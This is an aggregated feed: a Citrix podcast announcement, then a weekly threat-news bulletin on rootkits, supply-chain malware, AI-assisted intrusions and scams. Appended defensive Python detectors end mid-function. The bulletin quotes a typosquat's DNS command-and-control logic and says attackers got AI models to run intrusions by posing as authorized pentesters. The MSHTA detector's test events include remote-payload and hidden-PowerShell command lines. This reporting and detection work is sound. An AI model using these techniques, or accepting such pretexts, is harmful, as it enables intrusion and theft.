Thursday, May 21, 2026

Announcing our new podcast: the Citrix AI Hotsheet

My Citrix colleague Dave Brear and I just launched a podcast about the future of EUC and how AI is entering the enterprise workspace. We’re calling it the Citrix AI Hotsheet, where we pull together the most relevant conversations on what’s actually happening with enterprise AI in the real world.

Dave and I have both been working in large enterprise IT environments for decades. This is not an AI hype podcast where enthusiastic AI accelerationists talk about how easy it is to vibe code your way to utopia and how we’ll all be unemployed by next year. We have been working a collective 50 years and understand how enterprises really work, how change actually happens, and what it takes to safely deliver and secure the work environment for banks, hospitals, manufacturers, and governments.

That said, we also understand how humans work. Rank-and-file knowledge workers are finding their own ways to use AI tools (whether sanctioned by IT or not), while large enterprises struggle to balance security and governance needs from IT, workers’ desires and fears about AI, and their CEO’s desire to be “AI first” while also keeping the business running.

This is the world Dave and I live in and the world we cover in this podcast.

I come from a futurist’s perspective (where are things going), and Dave from an architect’s (what are customers dealing with today).

You can find the Citrix AI Hotsheet wherever you get your podcasts:

Reach out if it’s not on your platform of choice, and we’ll add it. We record video for those who want it, but the show is designed for audio podcast listeners, so watching the video is not necessary.

Our first episode is also now available.

Episode 1: AI agents, second brains, and the enterprise AI gap

In the first episode, I make the case that AI is going to enter the enterprise by using the same desktops and applications human workers already use. (There’s no way enterprises are rebuilding everything from scratch.) We dig into computer-using agents (CUAs), why they’ve been painfully slow, and a recent research paper that shows how semantic primitives instead of screenshots can cut token consumption by 80%.

Then Dave introduces “context vaults” (what I’ve been calling “second brains”) and why they are already changing how knowledge workers work, even though most enterprises can’t see it happening.

We close by discussing how we connected our two second brains via MCP so we can bounce ideas off each other’s AI directly. (In fact we both publish our second brains at davebrear.ai and brianmadden.ai, so you can try this yourself. Click either link for details. You can connect them to whatever chatbot you use with just a few clicks!)

We’re including full transcripts with every episode so you can feed them into your own AI tools.

Dave and I both added the transcript to our public second brains, so you can chat with your AI about it, or reach out to us on LinkedIn to discuss this episode or suggest topics for future ones.

Find Episode 1 here:



from Citrix Blogs https://ift.tt/MJZOmht
via IFTTT

ThreatsDay Bulletin: Linux Rootkits, Router 0-Day, AI Intrusions, Scam Kits and 25 New Stories

This week starts small.

A token leaks. A bad package slips in. A login trick works. An old tool shows up again. At first, it feels like the usual mess. Then you see the pattern: attackers are not always breaking in. They are using the parts we already trust.

That is what makes it worrying. The danger is in normal things now - updates, apps, cloud buttons, support chats, trusted accounts. AI does not make the attacks magic. It just helps people try more things, faster.

Here's what showed up this week.

  1. 47 zero-days exposed

    The Pwn2Own Berlin 2026 hacking contest has concluded, with security researchers collecting $1,298,250 in rewards after exploiting 47 zero-day flaws in various products from Windows, Linux, VMware, and NVIDIA. DEVCORE won the event with 50.5 Master of Pwn points and $505,000 in rewards throughout the three-day contest after hacking Microsoft SharePoint, Microsoft Exchange, Microsoft Edge, and Windows 11. STARLabs SG and Out Of Bounds followed with $242,500 (25 points) and $95,750 (12.75 points).

  2. Agentic AI security warning

    The U.K. National Cyber Security Centre (NCSC) has released new guidance for organizations to implement adequate security controls when rolling out agentic artificial intelligence (AI) tools in enterprise environments. "If an agent is over-privileged or poorly designed, a single failure can quickly become a serious incident," NCSC said. "It is crucial, therefore, to think before you deploy."

  3. Signal alternative pushed

    The Polish government is urging public officials and "entities within the National Cybersecurity System" to stop using Signal, instead directing them to use an encrypted messenger called mSzyfr developed by a leading Polish research organization, citing social engineering attacks orchestrated by advanced persistent threat (APT) groups. The development comes as multiple governments have warned of a rise in social engineering attacks, including efforts that involve threat actors impersonating Signal support, to take control of victims' accounts.

  4. Fraud suspects unmasked

    The Dutch police said the identity of 74 of 100 suspects has been unmasked following the launch of an initiative called Game Over?! that displays blurred photos of 100 suspected fraudsters on billboards at various public places, as well as in television and online advertisements, giving the criminals two weeks to surrender before the images are unblurred. Of these, 34 suspects voluntarily reported to authorities, while the remaining suspects were identified through information provided by the public. The youngest suspect is only 14, and the oldest is 42 years old. Game Over?! was launched in March 2026.

  5. Espionage admission

    U.S. President Donald Trump said he and Chinese President Xi Jinping discussed cyber attacks and espionage activities carried out by both nations during the bilateral meetings last week. "They're talking about the spying. Well, we do it too," Trump said during his return flight to the U.S. "We spy like hell on them too," adding "I told him, 'we do a lot of stuff to you that you don't know about and you're doing things to us that we probably do know about.'" While Trump did not elaborate on the attacks carried out against China, the acknowledgement comes as China has been accused of conducting sweeping intrusions into U.S. networks.

  6. Ransomware hits Korea

    The ransomware family known as Gunra has targeted five South Korean companies since it was first discovered in April 2025, S2W said. "When Gunra ransomware was first discovered, it utilized Conti-based ransomware," the South Korean security vendor noted. "However, after transitioning to a RaaS (Ransomware-as-a-Service) model, the group developed and utilized its own ransomware." As of March 2026, the group has claimed 32 victims.

  7. Composer token leak

    Composer, a dependency manager for the PHP programming language, has urged its users to update Composer to version 2.9.8 or 2.2.28 (LTS). "The new releases fix a vulnerability where Composer leaks the full contents of GitHub Actions issued GITHUB_TOKEN's or GitHub App installation tokens to the GitHub Actions logs," Composer said. The vulnerability has been assigned the CVE identifier CVE-2026-45793 (CVSS score: 7.5). The development came after GitHub introduced a new format for these tokens as of late last month. "The new format, including a - (hyphen) fails Composer's validation and leads to disclosure of the GITHUB_TOKEN in logs," Composer said. As workarounds, it's advised to disable any GitHub Actions workflow that runs Composer commands until Composer has been updated.

  8. Linux rootkit persists

    In July 2022, cybersecurity firm Intezer detailed a Linux malware named OrBit that implements advanced evasion techniques, gains persistence on the machine by hooking key functions, provides the threat actors with remote access capabilities over SSH, harvests credentials, and logs TTY commands. Nearly four years later, several new artifacts of the userland rootkit have been identified, indicating that the malware is being actively refined and maintained by its operators. "We discovered two parallel lineages: a full-featured 'Lineage A' build that tracks closely with the 2022 original, and a lite 'Lineage B' fork that drops entire capability domains (PAM, pcap, TCP-port hiding) in exchange for a smaller footprint," researcher Nicole Fishbein said. "Along the way, the operators rotate XOR keys, shuffle install paths, swap backdoor credentials, add auditd-evasion hooks, and eventually bolt on a service-side PAM impersonation primitive." OrBit has been put to use by Blockade Spider, a cybercrime group running Embargo ransomware campaigns. It's assessed that OrBit is a fork of an open-source rootkit called Medusa, which first publicly surfaced in December 2022. "Based on this information, there are two options: either the Medusa author published a privately-circulated rootkit source that had already been deployed operationally, or the earliest OrBit sample was built from a pre-publication snapshot of the same tree," Intezer said. "Either way, the 2022 OrBit sample and the December 2022 Medusa source tree are the same codebase. This suggests that the backdoor was created before its public release and has since been selectively forked, configured, and redeployed by multiple operators over four years."

  9. AI-driven intrusions surge

    Two emerging campaigns, dubbed SHADOW-AETHER-040 and SHADOW-AETHER-064, have independently deployed agentic AI with "strikingly similar tactics" to facilitate intrusion operations against governments and financial organizations in Latin America. "Both campaigns established traffic tunnels to victim systems, enabling AI agents to conduct malicious attacks directly into victim internal network environments via ProxyChains and SSH," Trend Micro said. "The AI agents dynamically generated multiple hacking tools and scripts, rather than relying on pre-built hacking tools. This reduced the likelihood of detection by traditional security solutions that rely on known tool signatures." The two activity clusters are said to be the work of separate entities. The attackers bypassed AI safety controls by framing their requests as authorized penetration testing and red teaming exercises. Undertaken by a Spanish-speaking threat actor, SHADOW-AETHER-040 has compromised six government entities in Mexico between December 27, 2025, and January 4, 2026. This activity is consistent with Gambit Security's report about large-scale compromise of multiple Mexican government organizations between December 2025 and February 2026 by an unknown adversary using Anthropic's Claude and OpenAI's GPT AI models to carry out the intrusion activities. According to Dragos, which is tracking the activity as TAT26-12, one of these attacks targeted a municipal water and drainage utility in January 2026, leading to an unsuccessful attempt to breach its operational technology environment. "Claude acted as the primary technical executor and independently identified the OT environment's relevance to critical infrastructure, assessed its potential as a crown jewel asset, and investigated possible access pathways to breach the IT-OT boundary," Dragos said.

    The second campaign, linked to a Portuguese-speaking hacking crew named SHADOW-AETHER-064, has been active since April and has singled out financial organizations in Brazil. The findings show how commercial AI tools are compressing the traditional attack kill chain, accelerating tasks like reconnaissance and exploit development that historically required significant time and operator expertise. Like in the case of VoidLink, while the tools assembled for these attacks may not be particularly sophisticated or novel, the speed at which AI models generate and improve upon them is operationally significant, essentially collapsing what would have taken days or weeks of manual development effort into hours.

  10. Mythos intel sharing expands

    According to the Wall Street Journal, Anthropic has begun letting users of its Mythos AI model share cybersecurity threats with others who may face similar vulnerabilities. "Last week, Anthropic began telling the companies they could share information about cyber threats and Mythos findings with other entities as long as it was done responsibly," a spokesperson for the company was quoted as saying. "As the program has matured, we've adapted them to ensure key information can be shared broadly - including outside the program - for maximum defensive impact." The development comes as Cloudflare said Mythos is a "real step forward" and is capable of chaining "small attack primitives together into a working exploit." It's also equipped to find vulnerabilities and prove they are exploitable. The web infrastructure and security company also said it has designed a multi-stage vulnerability discovery harness to scan codebases across "runtime, edge data path, protocol stack, control plane, and the open-source projects we depend on." Just like Microsoft's MDASH, different agents handle different responsibilities: "hunter" agents identify candidate vulnerabilities, others argue for or against their exploitability, while a deduplication stage collapses findings that share the same root cause. A tracer agent checks whether attacker-controlled input actually reaches the bug from outside the system, while a final "reporting" agent writes a structured report.

  11. Calls now encrypted

    Discord has announced that all voice and video calls through the communication platform are now protected by default with end-to-end encryption (E2EE). The solution is powered by the DAVE protocol. "The DAVE protocol is open, and the implementation is open-source," Discord said. "As of early March 2026, every voice and video call on Discord, whether in DMs, group DMs, voice channels, or Go Live streams, is end-to-end encrypted by default." Discord said there are no plans to extend it to text messages. "Many of the features people use on Discord were built on the assumption that text isn't end-to-end encrypted, and rebuilding them to work with encryption is a meaningful engineering challenge," it added.

  12. Azure identities abused

    Microsoft has shed light on a "methodical, sophisticated, and multi-layered attack" orchestrated by Storm-2949 with an aim to exfiltrate sensitive data from an unnamed organization's high-value assets. The attack, which is notable for abusing Microsoft's Self-Service Password Reset (SSPR) process to trick the target into completing multi-factor authentication (MFA) prompts, led to the exfiltration of data from Microsoft 365 applications, file-hosting services, and Azure-hosted production environments. The social engineering attack targeted IT personnel and senior leadership so as to compromise their identities for post-compromise actions. The attacker is also said to have conducted discovery activities, installed ScreenConnect, and attempted to disable Microsoft Defender Antivirus protections. "Storm-2949 didn't rely on traditional malware and other on-premises tactics, techniques, and procedures (TTPs)," Microsoft said. "Instead, they leveraged legitimate cloud and Azure management features to gain control-plane and data-plane access, which they then used to execute code remotely on VMs, and access sensitive cloud resources such as Key Vaults and storage accounts, among others. These activities allowed them to move laterally across cloud and endpoint environments while blending into expected administrative behavior."

  13. App Store fraud blocked

    Apple said its App Store stopped over $2.2 billion in potentially fraudulent transactions and rejected over 2 million problematic app submissions in 2025. "Last year, Apple's systems also successfully rejected 1.1 billion fraudulent customer account creations - blocking bad actors at the outset - and deactivated an additional 40.4 million customer accounts for fraud and abuse," Apple said. "In 2025, Apple terminated 193,000 developer accounts over fraud concerns and rejected more than 138,000 developer enrollments. To further protect users from harmful software, Apple in 2025 detected and blocked 28,000 illegitimate apps on pirate storefronts, which include malware, pornography apps, gambling apps, and pirated versions of legitimate apps from the App Store." Apple also rejected over 22,000 submissions for containing hidden or undocumented features and more than 443,000 submissions for privacy violations. In the last month alone, the iPhone maker said it prevented 2.9 million attempts to install or launch apps distributed illicitly outside the App Store or approved alternative app marketplaces.

  14. Fraud routing exposed

    Two U.S. nationals, CEO Adam Young, 42, of Miami, and Harrison Gevirtz, 33, of Las Vegas, have pleaded guilty to running a business that provided services to customers engaged in widespread telemarketing and tech-support fraud schemes targeting victims across the country. The services, which included telephone numbers, call routing services, call tracking, and call forwarding services, were offered to customers who engaged in tech-support fraud schemes. They are scheduled to be sentenced on June 16, 2026. The investigation also led to the conviction of five India-based telemarketing fraudsters and a former employee of their call routing company (Sahil Narang, Chirag Sachdeva, Abrar Anjum, Manish Kumar, and Jagmeet Singh Virk) for targeting and defrauding Americans. "Call centers based in India utilized Young and Gervitz's business to route their 'tech fraud' scheme calls and, in some instances, advised those fraudsters on methods intended to reduce complaints and prevent account terminations," the U.S. Justice Department said. The schemes used deceptive pop-up messages to falsely convince users that their computers had been infected with viruses or malware, urging them to contact a number to address the issue. In reality, the numbers connected the victims to call centers, where they were duped into paying hundreds of dollars for unnecessary or fictitious technical-support services. In some instances, the call center agents gained remote access to victims' computers and obtained personal and financial information.

  15. Linux printing RCE risk

    HP has released fixes for CVE-2026-8631 (CVSS score: 9.3), a critical heap-based buffer overflow vulnerability in HPLIP that could allow escalation of privileges and/or arbitrary code execution. "Because HPLIP is deeply integrated into the standard Linux printing architecture (CUPS), this flaw exposes millions of Linux endpoints and enterprise print servers," security researcher Mohamed Lemine Ahmed Jidou, who discovered the flaw, told The Hacker News. "An unauthenticated attacker over the network - or a low-privileged local user - can silently exploit this by simply submitting a maliciously crafted print job. Successful exploitation grants the attacker arbitrary command execution on the host machine. This allows for immediate system compromise, unauthorized access to sensitive documents passing through the print spooler, and provides a stealthy foothold for lateral movement across corporate networks."

  16. Telegram accounts hijacked

    AhnLab is warning of a new Telegram-oriented smishing campaign that's designed to take control of victims' accounts and steal account information using SMS messages that claim to be about non-existent security issues. "Threat actors hijack Telegram accounts by tricking users into entering their phone numbers and login codes on phishing sites," AhnLab said. "Once an account is compromised, it can lead to personal information and chats being leaked, as well as secondary damage."

  17. Premium SMS fraud

    A new sophisticated Android malware campaign dubbed Premium Deception has been observed conducting carrier billing fraud through premium SMS abuse across Malaysia, Thailand, Romania, and Croatia between March 2025 and January 2026. The activity involves more than 250 malicious applications that selectively target users based on their mobile operator, stealthily subscribing users to premium services without their knowledge or consent. Device metadata and subscription confirmations are sent to the operators via a Telegram-based exfiltration channel. "When deployed on devices with non-targeted operators, the malware employs a fallback mechanism to display benign content, thereby evading detection and maintaining persistence," Zimperium zLabs said. Three distinct malware variants have been identified, each with varying levels of sophistication. There is no evidence that these apps were circulated via the Google Play Store. Instead, the scheme relies on social media platforms like Facebook and TikTok for distribution.

  18. Brazilian banking RAT

    A new Brazilian banking trojan dubbed Banana RAT has become the latest malware to target financial institutions in the region. Unlike other Latin American banking malware that are typically written in Delphi, Banana RAT is a PowerShell-only client orchestrated by a Python (FastAPI) server-side polymorphism engine. Once active, it enables operator-driven fraud through remote input control, keylogging, clipboard monitoring, screen streaming, fake overlays, and Pix QR code interception targeting Brazilian banks. It also monitors foreground window titles and serves a bogus credential harvesting overlay when a victim opens a website that matches a target list of more than 30 bank and cryptocurrency exchanges. Trend Micro, which is tracking the activity under the moniker SHADOW-WATER-063, said the design diverges "meaningfully" from the Delphi binary architecture historically associated with the banking malware ecosystem comprising Grandoreiro, Mekotio, Casbaneiro, Guildma, and CHAVECLOAK. "The Brazilian cybercrime cartels are very sophisticated and organized, and they have been a bane to the financial sector since 2000," Tom Kellermann, TrendAI's vice president of AI Security and Threat Research, said. "The RATs and rootkits they develop are on par with those we have seen from Russia. Insufficient attention is being paid to cybercrime in LATAM, and the financial sector has good reason to be concerned as something wicked comes this way."

  19. DNS-backed Go backdoor

    A malicious Go module published as github.com/shopsprint/decimal has been flagged as a typosquat of the widely used github.com/shopspring/decimal arbitrary precision arithmetic library. It was first published in November 2017 and was weaponized in August 2023 when version v1.3.3 added a malicious functionality that "opens a DNS TXT record command-and-control channel to a threat actor-controlled subdomain on a free dynamic DNS provider," per Socket. Although the GitHub repository and the shopsprint owner account have since been removed, the library continues to be served by proxy.golang[.]org. The payload "polls net.LookupTXT("dnslog-cdn-images.freemyip.com") every five minutes, and sleeps on DNS failure without logging or signaling an error," researcher Kush Pandya said. "Each returned TXT value is passed directly to os/exec.Command and executed."

  20. npm package hijacked

    The npm package art-template, a JavaScript template engine with about 26,000 weekly downloads, has been compromised through a maintainer account takeover to push malicious versions (from 4.13.3 through 4.13.6) designed to load external JavaScript from third-party domains. "Unauthorized code in template-web.js injects external <script> tags into any page using the browser bundle," SafeDep said. "The external domain (v3.jiathis[.]com) serves a multi-stage payload when the request includes a Referer header. The payload injects Baidu Analytics tracking on all visitors and targets iPhone users with a hidden iframe chain leading to an obfuscated JavaScript payload. The final payload is the Coruna exploit kit."

  21. Malware game removed

    A malicious game distributed through Steam has been removed from Valve after it was observed profiling players' systems and communicating with external infrastructure that allows it to deploy secondary payloads. The game, titled Beyond The Dark, masqueraded as a free indie horror title on Steam. The discovery was documented by YouTuber Eric Parker.

  22. Router zero-day outage

    The exploitation of a zero-day vulnerability in Huawei enterprise router software led to a nationwide telecom outage in Luxembourg on July 23, 2025, The Record reported this week. The incident disrupted mobile, landline, and emergency communications for more than three hours. The attack is said to have caused Huawei enterprise routers to enter into a continuous restart loop, crashing parts of POST Luxembourg's infrastructure. There are currently no details about the vulnerability, and it remains unclear if the issue was patched by Huawei.

  23. Crypto ATM losses surge

    The U.S. Federal Bureau of Investigation (FBI) has revealed that Americans lost over $388 million last year to scams using cryptocurrency kiosks (aka crypto ATMs or Bitcoin ATMs). "Cryptocurrency kiosks are ATM-like devices or electronic terminals that allow users to exchange cash and cryptocurrency," the FBI said. "Criminals may direct victims to send funds via cryptocurrency kiosks." The development comes as CertiK noted that physical coercion attacks (aka wrench attacks) on cryptocurrency holders rose 75% year-over-year to 72 confirmed cases worldwide and $41 million in known losses in 2025, up 44% from 2024. This year alone, 34 verified incidents have been recorded internationally, compared to 24 over the same period in 2025.

  24. ICS attacks persist

    Operational technology security company Nozomi Networks said it detected 29 events between July 2025 and January 2026 that it "conclusively identified as Sandworm activity." Based on data collected from customer and partner engagements, honey research, and telemetry, the activity follows a bureaucratic execution model, "peaking midweek and during post-lunch business hours, with Wednesday at approximately 2:00 PM Moscow time showing the highest alert volume." Across the dataset, 17 Sandworm-infected machines were identified at 10 customers. These systems conducted lateral movement against 923 unique internal targets. "Despite widespread awareness and patch availability, Sandworm continues to rely on older but proven exploit chains, including EternalBlue, DoublePulsar, and WannaCry," Nozomi Networks said. "Perhaps the most critical finding: every single Sandworm-infected system produced 20 to 155 days of warning alerts prior to Sandworm activity."

  25. Stego loader deployed

    A new phishing campaign has been observed using invoice-themed lures to distribute malicious archives to trigger the execution of JavaScript code, which employs environment variables to hide malicious commands and uses a steganographic loader dubbed PawsRunner to deploy the PureLogs infostealer malware. "The embedded JavaScript uses a sophisticated technique to store decoded malicious commands in environment variables, which then triggers a decrypted steganographic .NET loader," Fortinet said. "This loader retrieves the final payload by extracting encrypted data hidden within a cat image. This version of PureLogs uses extensive async/await patterns to improve task efficiency and complicate analysis." A similar campaign was detailed by Swiss Post Cybersecurity in January 2026.

  26. Card dump released

    The notorious B1ack's Stash dark web carding marketplace has announced the free download of 4.6 million stolen credit card records. According to SOCRadar, the released data includes full card numbers, expiration dates, CVV2 codes, cardholder names, billing addresses, email addresses, phone numbers, and IP addresses. Of these, 4.3 million records appear to be new and usable for illicit activities. Most of the records belong to victims from the U.S., Canada, the U.K., France, and Malaysia.

  27. Browser-locking scareware

    A new web-based scareware kit called CypherLoc is capable of combining "advanced evasion, aggressive browser controls, and psychological manipulation" to drive victims into calling fraudulent tech support phone numbers. Barracuda Networks said it has observed around 2.8 million attacks featuring the kit since the start of 2026. "The attack usually starts with a phishing email that directs the victim to a malicious web page through a link that is either embedded in the email body or in an attachment," Barracuda said. "The web page initially appears harmless but gradually transitions into a fully controlled scareware environment. The trigger for this transition is hidden in the web page and will only decrypt if certain conditions are met." The end result is a full-screen scareware interface that locks the browser and displays fake security messages that urge victims to contact support immediately.

  28. AI phishing at scale

    New research has demonstrated that "publicly available social-media data and generative AI (GenAI) can be misused to automate and scale highly personalized, context-aware spear-phishing campaigns." Researchers from the University of Texas at Arlington and Louisiana State University, Baton Rouge, said a "small amount of public activity per target" is enough for AI models to extract interests and contextual cues that could be exploited to carry out persuasive phishing campaigns that mirror a target's style. The findings show that bad actors do not have to rely on stolen databases or extensive reconnaissance to carry out targeted phishing campaigns.

  29. Legacy LOLBIN abused

    Bitdefender has disclosed that attackers are continuing to exploit Microsoft HTML Application Host (MSHTA), a legacy utility available by default on Windows systems, for malware campaigns. "MSHTA remains a widely abused Living-off-the-Land binary (LOLBIN) despite being a legacy utility," Bitdefender said. "Attackers use it across multiple malware categories, from commodity stealers to advanced threats. Campaigns frequently rely on multi-stage, fileless execution chains involving PowerShell and HTA scripts." MSHTA has been abused in delivery chains for commodity stealers such as Lumma Stealer and Amatera, loaders such as CountLoader and Emmenhtal Loader (aka PEAKLIGHT), clipper malware, and more advanced threats like Purple Fox.

  30. GovCloud secrets exposed

    A contractor for the U.S. Cybersecurity and Infrastructure Security Agency (CISA) maintained credentials to several highly privileged AWS GovCloud accounts and a large number of internal CISA systems exposed on a public GitHub repository (ironically named "Private-CISA") since November 2025. The repository was discovered by GitGuardian on May 14, 2026. It harbored 844 MB of plain-text passwords, AWS tokens, and Entra ID SAML certificates belonging to the agency. The repository has since been pulled offline following responsible disclosure. There is no evidence that any sensitive data was compromised as a result of this incident.

  31. Trojanized apps cluster

    Palo Alto Networks Unit 42 said it has identified 4,000 samples across 100 unique variants associated with a threat known as TamperedChef (aka EvilAI), which involves using trojanized versions of productivity software to deliver malicious payloads using malicious ads that direct users to sites hosting the applications. "TamperedChef-style malware samples share characteristics with potentially unwanted programs (PUPs) and adware," Unit 42 said. "These include robust mechanisms to remain persistent, and end-user licensing agreements (EULAs) that attempt to legally cover the software's questionable actions. However, TamperedChef-style malware is far more stealthy than PUPs or adware, remaining dormant for weeks to months before activating. This includes continuous command and control (C2) methods enabling adversaries to retrieve additional payloads, such as information stealers, proxy tooling or remote access Trojans (RATs)." The activity has been attributed to three distinct clusters distributing malicious apps since early 2023: CL-CRI-1089 (Calendaromatic, DocuFlex, and AppSuite PDF), CL-UNK-1090 (CrystalPDF, Easy2Convert, and PDF-Ezy), and CL-UNK-1110 (JustAskJacky, GoCookMate, RocketPDFPro, ManualReaderPro). While CL-CRI-1089 appears to target credentials and deploy adware and proxy-style payloads, the motivations of the other two clusters are unknown.
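Item 19 above describes a Go typosquat whose module path differs from github.com/shopspring/decimal by a single character. The following is an added example, not Socket's tooling or any project's own code, that flags near-miss module paths in a go.mod by edit distance against an allowlist of approved modules. It generalizes beyond the one case in the item: any required module that is not itself approved but sits within a small edit distance of an approved one is reported. The allowlist entries other than shopspring/decimal, the go.mod contents and the distance threshold of 2 are constructed assumptions.

```python
"""Flag likely typosquats in a go.mod require list by edit distance.

Added example (not Socket's tooling or any project's code). The allowlist
and go.mod below are constructed for the demo; only shopspring/decimal and
the shopsprint near-miss come from the report.
"""
import re

# Constructed allowlist of approved modules. In practice, generate this from
# the organisation's dependency inventory rather than hand-writing it.
KNOWN_GOOD = {
    "github.com/shopspring/decimal",
    "github.com/stretchr/testify",
    "golang.org/x/crypto",
}

# Constructed go.mod: two approved modules plus one typosquat of an approved one.
SAMPLE_GO_MOD = """\
module example.com/billing

go 1.22

require (
\tgithub.com/shopsprint/decimal v1.3.3
\tgithub.com/stretchr/testify v1.9.0 // indirect
)

require golang.org/x/crypto v0.23.0
"""

# Module path followed by a version; trailing "// indirect" comments are ignored.
REQUIRE_LINE = re.compile(r"^\s*([A-Za-z0-9._~/-]+)\s+(v\S+)")


def levenshtein(a, b):
    """Classic edit distance (insert/delete/substitute), fine for short paths."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def parse_requires(go_mod):
    """Yield (module_path, version) for both block and single-line require forms."""
    in_block = False
    for line in go_mod.splitlines():
        stripped = line.strip()
        if stripped.startswith("require ("):
            in_block = True
            continue
        if in_block and stripped == ")":
            in_block = False
            continue
        if in_block:
            m = REQUIRE_LINE.match(line)
        elif stripped.startswith("require "):
            m = REQUIRE_LINE.match(stripped[len("require "):])
        else:
            continue
        if m:
            yield m.group(1), m.group(2)


def find_typosquats(go_mod, known_good=KNOWN_GOOD, max_distance=2):
    """Return [(suspect_path, version, closest_approved_path, distance), ...].

    Approved modules are skipped; anything else within max_distance edits of an
    approved module is a candidate typosquat and should be reviewed by a human.
    """
    findings = []
    for path, version in parse_requires(go_mod):
        if path in known_good:
            continue
        closest = min(known_good, key=lambda k: levenshtein(path, k))
        distance = levenshtein(path, closest)
        if distance <= max_distance:
            findings.append((path, version, closest, distance))
    return findings


if __name__ == "__main__":
    for path, version, closest, distance in find_typosquats(SAMPLE_GO_MOD):
        print(f"SUSPECT {path}@{version}: {distance} edit(s) from approved {closest}")
```

The near-miss check is a complement to, not a replacement for, an exact denylist of reported malicious paths; a distance threshold of 2 keeps false positives low for paths of this length, but deliberately different forks (a renamed organisation, for example) will also land in the findings and need a human decision.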
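Item 20 gives a concrete compromised version range for art-template (4.13.3 through 4.13.6). Below is an added example, not SafeDep's tooling or the art-template project's code, that walks a package-lock.json and reports every install whose version falls inside an inclusive range. It handles both the lockfileVersion 2/3 "packages" map (including nested node_modules paths) and the legacy lockfileVersion 1 nested "dependencies" tree. The two lockfiles are constructed; the package name and range are the ones the item states.

```python
"""Find installs of an npm package whose version lies in a compromised range.

Added example (not SafeDep's tooling or the art-template project's code).
The lockfiles below are constructed; only the package name and the
4.13.3 - 4.13.6 range come from the report.
"""
import json
import re
import sys

# Constructed lockfileVersion 3 file: one affected install at the top level,
# one unaffected (older) nested copy under another dependency.
SAMPLE_LOCK_V3 = {
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "dependencies": {"art-template": "^4.13.0"}},
        "node_modules/art-template": {
            "version": "4.13.4",
            "resolved": "https://registry.npmjs.org/art-template/-/art-template-4.13.4.tgz",
        },
        "node_modules/some-dep": {"version": "1.0.0"},
        "node_modules/some-dep/node_modules/art-template": {"version": "4.13.2"},
    },
}

# Constructed lockfileVersion 1 file with the legacy nested "dependencies" tree.
SAMPLE_LOCK_V1 = {
    "name": "demo-legacy",
    "lockfileVersion": 1,
    "dependencies": {
        "art-template": {"version": "4.13.6"},
        "legacy-widget": {
            "version": "2.0.0",
            "dependencies": {"art-template": {"version": "4.13.2"}},
        },
    },
}


def parse_semver(version):
    """Return (major, minor, patch); pre-release and build metadata are ignored."""
    m = re.match(r"^v?(\d+)\.(\d+)\.(\d+)", version.strip())
    if not m:
        raise ValueError(f"unparseable version: {version!r}")
    return tuple(int(x) for x in m.groups())


def in_range(version, lo, hi):
    """Inclusive check: lo <= version <= hi."""
    return parse_semver(lo) <= parse_semver(version) <= parse_semver(hi)


def _walk_legacy(deps, prefix, package, lo, hi, out):
    """Recurse through a lockfileVersion 1 'dependencies' tree."""
    for name, meta in deps.items():
        path = prefix + name
        version = meta.get("version")
        if name == package and version and in_range(version, lo, hi):
            out.append((path, version))
        _walk_legacy(meta.get("dependencies", {}), path + "/node_modules/", package, lo, hi, out)


def affected_installs(lock, package, lo, hi):
    """Return [(install_path, version), ...] for every copy of `package` in [lo, hi]."""
    out = []
    if "packages" in lock:
        # lockfileVersion 2/3: flat map keyed by install path; the "" root entry has no version.
        for path, meta in lock["packages"].items():
            is_target = path == f"node_modules/{package}" or path.endswith(f"/node_modules/{package}")
            if is_target and "version" in meta and in_range(meta["version"], lo, hi):
                out.append((path, meta["version"]))
    else:
        _walk_legacy(lock.get("dependencies", {}), "", package, lo, hi, out)
    return out


if __name__ == "__main__":
    # Pass a real package-lock.json path as the first argument, or run on the constructed sample.
    lock = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_LOCK_V3
    for path, version in affected_installs(lock, "art-template", "4.13.3", "4.13.6"):
        print(f"AFFECTED {path} ({version})")
```

A lockfileVersion 2 file carries both maps; the "packages" map is authoritative there, which is why the legacy walk only runs when it is absent. Nested copies matter because a transitive dependency can pin an affected version even when the top-level install is clean.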
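Item 29 describes multi-stage, fileless chains in which MSHTA hands off to HTA scripts and PowerShell. The following added example, which is not Bitdefender's detection content, runs four hunting rules over Sysmon-style process-creation records: mshta.exe launched with a remote URL, launched with an inline javascript:/vbscript: argument, launched as a child of an Office application, or spawning a scripting host or shell. The events are constructed and the rule set is an assumption; the field names mirror Sysmon Event ID 1 (Image, CommandLine, ParentImage).

```python
"""Flag suspicious mshta.exe activity in process-creation telemetry.

Added example (not Bitdefender's detection content). The rules are an
assumption about what is worth hunting for; the event records below are
constructed, with Sysmon-style field names but invented paths and scripts.
"""
import re
from pathlib import PureWindowsPath

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
REMOTE_URI = re.compile(r"https?://", re.IGNORECASE)
INLINE_SCRIPT = re.compile(r"\b(?:javascript|vbscript):", re.IGNORECASE)

# Constructed Sysmon Event ID 1 records. Event 0 is a benign vendor help file;
# events 1-4 each exercise one rule.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\VendorApp\help\index.hta"'},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe http://example.invalid/update.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"powershell.exe -NoProfile -WindowStyle Hidden -File C:\Users\Public\stage.ps1"},
    {"Image": r"C:\Windows\SysWOW64\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe javascript:close()"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"mshta.exe C:\Users\alice\AppData\Local\Temp\invoice.hta"},
]


def basename(image):
    """Lower-cased file name of a Windows image path ('' if the field is missing)."""
    return PureWindowsPath(image).name.lower()


def classify(event):
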